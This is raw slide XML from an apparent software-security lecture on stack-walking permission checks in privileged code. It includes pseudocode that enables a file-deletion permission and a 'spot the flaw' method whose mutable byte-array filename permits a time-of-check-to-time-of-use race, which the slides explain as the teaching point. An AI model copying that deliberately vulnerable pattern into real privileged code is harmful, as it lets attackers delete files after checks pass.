              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE60926-3236-3E7B-37ED-ADA6B32B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8" y="3170238"/>
            <a:ext cx="8477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800"/>
              <a:t>calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70676" name="Straight Arrow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6649A3FA-1FAE-64AA-FBB3-E50FC3F8124D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="70660" idx="3"/>
            <a:endCxn id="70662" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2520950" y="3081338"/>
            <a:ext cx="100647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7" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{817641F6-3B97-8BD4-0644-D8E224DAE9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05350" y="3079750"/>
            <a:ext cx="100647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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B2C185-021E-D935-FB69-3CDDE2607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Stack walk modifiers: examples</a:t>
            </a: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5ABBB249-E6C6-066B-32BD-8C1F985ABF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29F9DE7E-9B9B-4339-B036-7124DFE5449E}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1400"/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54608A50-BDB2-21B0-D820-9233768BA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3" y="2660650"/>
            <a:ext cx="1176337" cy="839788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD1</a:t>
            </a:r>
          </a:p>
        </p:txBody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66E726B4-9638-0440-04B1-2BCF062C8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825" y="2660650"/>
            <a:ext cx="1176338" cy="839788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72710" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6762D1B-7D16-AB6F-FEFC-635E42AC5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2660650"/>
            <a:ext cx="1176338" cy="839788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="316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2700"/>
              <a:t>PD2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72711" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE7BCC14-9C13-CC31-12D2-C750FCE01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163" y="3079750"/>
            <a:ext cx="3365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12" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C429A6B-900D-F49A-EDB8-A2BA02BDE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2887663"/>
            <a:ext cx="30622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/>
              <a:t>demandPermission(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72713" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E5E90DD-45ED-EB2F-8FE5-A5E02A6BB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3822700"/>
            <a:ext cx="1344613" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P4,P2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2700">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72714" name="Oval 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D959C1B-5EA3-AB0A-347A-156C16C58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288" y="3835400"/>
            <a:ext cx="1344612" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400"/>
              <a:t>P1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72715" name="Oval 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE1CD88-A3A1-8C97-3A08-A6067FC2E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75" y="3835400"/>
            <a:ext cx="1430338" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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2400"/>
              <a:t>P1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400"/>
              <a:t>,P3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72716" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105231D8-5C1E-DCED-9C4A-A951282DDEDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="72713" idx="0"/>
            <a:endCxn id="72708" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1931988" y="3498850"/>
            <a:ext cx="1587" cy="322263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7" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA5EDC2A-B8EC-A307-8A2E-84841A38ADFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="72714" idx="0"/>
            <a:endCxn id="72710" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4114800" y="3498850"/>
            <a:ext cx="1588" cy="33655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8" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CAC62CA-9956-31FB-A2C8-B35FA539B808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="72715" idx="0"/>
            <a:endCxn id="72709" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6111082" y="3645694"/>
            <a:ext cx="334962" cy="4445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1" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D2472A-EC98-54C7-753D-BA0C4CFC0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5764213"/>
            <a:ext cx="3683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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DemandPermission(P2) fails</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72720" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B3DA2FD-2F74-C2A1-C33A-4E84FEA1E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8" y="2203450"/>
            <a:ext cx="29940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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DisablePermission(P2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72721" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404E554F-C30D-A3F6-06C4-F58C0A2B2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5268913"/>
            <a:ext cx="49593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/>
              <a:t>Will DemandPermission(P2) succeed ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72722" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118AA449-EBD2-7072-7587-7D4AA5C6D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3170238"/>
            <a:ext cx="8477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800"/>
              <a:t>calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72723" name="Text Box 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4856F44D-189F-D4AA-2336-34D970E49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3138488"/>
            <a:ext cx="847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eaLnBrk="1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800"/>
              <a:t>calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="72724" name="Straight Arrow Connector 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB65A07-5527-14C5-22BA-4768FD20C2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20950" y="3081338"/>
            <a:ext cx="100647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5" name="Straight Arrow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{996D1D69-65D9-D571-D1FB-0FB80664D3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05350" y="3079750"/>
            <a:ext cx="100647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618589A8-19D1-5123-2C41-2987D54D9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400"/>
              <a:t>Using stack walking to restrict access to functionality</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="2400"/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5F68FFC6-FF20-5325-C7A7-10DE952490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Class Trusted{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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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unsafeMethod</a:t>
            </a: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(File f){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delete f; }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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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safeMethod</a:t>
            </a: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(File f) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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...</a:t>
            </a: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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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lots of checks on f;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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enablePermission (FileDeletionPermission);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delete f;}                                                                      </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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anotherSafeMethod</a:t>
            </a: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(){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enablePermission (FileDeletionPermission);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delete “/tmp/bla”; }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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4756" name="Rounded Rectangular Callout 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FFD5698-0333-EECE-ED8F-7EBA75C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363" y="1474788"/>
            <a:ext cx="2232025" cy="1225550"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -136028"/>
              <a:gd name="adj2" fmla="val 97787"/>
              <a:gd name="adj3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2000" i="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“I take full responsibility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2000" i="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for my callers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="0099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4757" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E26B12A-99B1-0DFC-5BFD-0548D60F53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E5B86D2-2D15-4250-B346-DC308A52BFED}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{394CC5BB-583F-C8E2-29BE-13888971D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Typical programming pattern </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1F1B4A-627F-39D7-5926-AE29BD5C5C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/>
              <a:t>The typical programming pattern in privileged components,                             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/>
              <a:t>esp. in public methods accessible by untrusted code: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endParaRPr lang="en-US" altLang="nl-NL"/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public methodExposingScaryFunctionality (A a, B b){  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....; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" i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do security checks on arguments a and b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enable privileges (P1,P2);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 i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0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do the dangerous stuff that needs these privileges;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disable privileges (P1,P2);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.... }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endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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/>
              <a:t>in keeping with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>principle of least privilege</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75780" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12F3E696-D909-F30F-8CCE-6F1D535FF8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FD3008FF-5D79-4A81-8717-39368ABFBF6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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CC195CA1-0F67-2363-8E6F-1FA5757BD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Spot the security flaw?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/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80939643-3452-C9C8-5767-A88C2A9EA7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Class Good{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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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m1 </a:t>
            </a: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(String filename) {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 i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 lot of checks on filename;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 enablePermission (FileDeletionPermission);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 delete filename;}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                                                               </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2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m2</a:t>
            </a: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(byte[] filename){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 i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 lot of checks on filename;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 enablePermission (FileDeletionPermission);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 delete filename;}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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6804" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AA86D44-14A5-6494-8001-816F0DCAAF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A208D34F-F273-4224-825B-F2EB5D44A507}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" alt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inhoud 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519EB38E-1294-EC0E-8925-0C3B84D16A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</a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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</a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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</a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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</a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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</a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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6147" name="Titel 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E656AFF-91FE-BFBE-BC35-FBEB1F161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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Tijdelijke aanduiding voor dianummer 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E81BF04-FD68-0CC7-2400-5F67432C82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3DCCBB9-64E8-42C8-99F9-01E8DAE69279}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6149" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCE5458-8B8F-ACD3-BB24-DE4262EA7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1663700"/>
            <a:ext cx="12319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Afbeelding 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731DFBA8-2B17-24D5-2F35-5A1D0AB58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9" b="13873"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="936625" y="1797050"/>
            <a:ext cx="3706813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Tijdelijke aanduiding voor inhoud 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D457E059-C84E-ECD3-139A-176032D62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3709988"/>
            <a:ext cx="34226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ounded Rectangular Callout 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B48B7B0-BEC9-753F-5899-07515A694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3597275"/>
            <a:ext cx="2736850" cy="2895600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -166658"/>
              <a:gd name="adj2" fmla="val -31406"/>
              <a:gd name="adj3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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>m2 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>because byte arrays are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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mutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attackers can could change the value of filename after the checks, in a multi-threaded setting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77827" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB98DED-5661-9785-CB27-4DC3E1F68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TOCTOU attack (Time of Check, Time of Use)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77828" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02AA45D6-786A-A24D-00CA-7C821BB09F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 dirty="0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Class Good{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 dirty="0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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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m1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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filename) {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 i="1" dirty="0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 lot of checks on filename;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 dirty="0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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0" err="1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enablePermission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0" err="1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FileDeletionPermission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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 dirty="0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 delete filename;}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 dirty="0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                                                              </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial Unicode MS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 dirty="0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public void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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m2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0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byte[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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filename){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 i="1" dirty="0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 lot of checks on filename;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 dirty="0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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0" err="1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enablePermission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0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(</a:t>
            </a:r>
            <a:r>
